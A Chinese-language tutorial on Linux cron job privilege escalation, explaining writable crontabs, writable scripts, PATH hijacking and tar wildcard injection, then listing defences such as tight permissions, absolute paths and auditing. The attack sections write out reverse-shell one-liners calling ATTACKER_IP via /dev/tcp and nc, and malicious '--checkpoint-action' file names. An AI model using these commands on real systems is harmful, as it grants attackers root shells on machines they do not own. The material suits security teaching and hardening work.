** ，Cron Job提权是一种常见的Linux权限提升技术，攻击者通过滥用系统的定时任务（Cron Job）机制获取更高权限，其原理是当Cron Job以root权限运行用户可控的脚本或文件时，攻击者可篡改脚本内容或劫持环境变量，插入恶意代码（如反弹Shell），从而在任务执行时获得root权限，利用方式包括：1）写入恶意脚本到Cron目录；2）覆盖现有Cron任务脚本；3）利用环境变量（如PATH）劫持，防御措施包括：严格限制Cron Job的权限（避免以root运行）、检查任务脚本的归属与权限、禁用不必要的Cron任务、使用绝对路径及日志监控，管理员应定期审计Cron配置，避免此类漏洞。

在Linux系统中,Cron Job（定时任务）是一种常见的自动化任务调度工具，允许用户或系统管理员在特定时间或间隔执行脚本或命令，如果配置不当，Cron Job可能成为攻击者提权（Privilege Escalation）的突破口，本文将深入探讨Cron Job提权的原理、常见利用方式以及如何有效防御此类攻击。

---

Cron Job简介

Cron是Linux系统中用于周期性执行任务的守护进程,通过crontab文件配置任务，Cron Job通常用于日志轮转、备份、系统维护等场景，其基本语法如下：

* * * * * command-to-be-executed

五个星号分别代表：分钟、小时、日期、月份、星期。

Cron Job的执行权限取决于其所属用户：

• 系统级Cron Job：位于/etc/crontab或/etc/cron.d/，通常由root用户管理。
• 用户级Cron Job：位于/var/spool/cron/crontabs/，由普通用户管理。

---

Cron Job提权原理

Cron Job提权的核心在于利用不安全的文件权限或脚本内容，使攻击者能够注入恶意代码，从而以更高权限（如root）执行命令，常见漏洞场景包括：

1 可写的Cron Job文件

如果某个Cron Job文件（如/etc/crontab或用户级Cron Job）的权限设置不当（如chmod 777），攻击者可以修改该文件，插入恶意命令。

示例攻击步骤：

1. 查找可写的Cron Job文件：

   ls -la /etc/crontab
   find / -type f -perm -o+w -name "cron*" 2>/dev/null

2. 如果发现可写文件,直接编辑并添加反弹Shell命令：

   * * * * * root /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

3. 等待Cron Job执行，获取root权限Shell。

2 可写的Cron Job脚本

即使Cron Job文件本身不可写，如果它调用的脚本可被修改，攻击者仍可提权。

示例攻击步骤：

1. 查找Cron Job调用的脚本：

   cat /etc/crontab | grep -v "#"

2. 检查脚本权限：

   ls -la /path/to/script.sh

3. 如果脚本可写,直接修改内容：

   echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f" >> script.sh

4. 等待Cron Job执行，获取Shell。

3 环境变量滥用

Cron Job运行时可能继承错误的环境变量（如PATH），导致攻击者通过劫持路径执行恶意程序。

示例攻击步骤：

1. 检查Cron Job是否使用相对路径：

   cat /etc/crontab | grep -v "#"

2. 如果发现类似backup.sh（无绝对路径），可以在当前用户可写目录（如/tmp）创建同名恶意脚本：

   echo "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" > /tmp/backup.sh
   chmod +x /tmp/backup.sh
   export PATH=/tmp:$PATH

3. 等待Cron Job执行，触发恶意脚本。

4 通配符注入（Wildcard Injection）

如果Cron Job使用通配符（如）执行命令，攻击者可能通过创建特殊文件名进行命令注入。

示例攻击步骤：

1. 假设Cron Job执行：

   * * * * * root tar -czf /backups/*.log

2. 攻击者创建恶意文件名：

   touch "--checkpoint=1"
   touch "--checkpoint-action=exec=sh shell.sh"

3. 当tar执行时，会解析这些参数并执行恶意脚本。

---

防御措施

为了防止Cron Job提权，管理员应采取以下措施：

1 最小权限原则

• 限制Cron Job文件权限：

  chmod 600 /etc/crontab
  chown root:root /etc/crontab

• 避免使用root运行普通任务：尽量使用低权限用户执行Cron Job。

2 使用绝对路径

在Cron Job中始终使用绝对路径，避免依赖环境变量：

* * * * * root /usr/bin/python3 /scripts/backup.py

3 审计Cron Job

定期检查系统Cron Job：

crontab -l # 查看当前用户Cron Job
cat /etc/crontab # 查看系统Cron Job
ls -la /etc/cron.* # 检查Cron目录

4 日志监控

启用Cron日志（/var/log/cron）并监控异常任务执行。

5 避免通配符滥用

在脚本中避免直接使用,改用显式文件列表。

---

Cron Job提权是Linux系统中常见的安全问题，攻击者通过篡改任务文件、劫持脚本或滥用环境变量获取更高权限，管理员应严格限制Cron Job权限、使用绝对路径并定期审计，以降低提权风险。

通过本文的分析,希望读者能更深入地理解Cron Job提权的原理与防御方法，确保系统安全。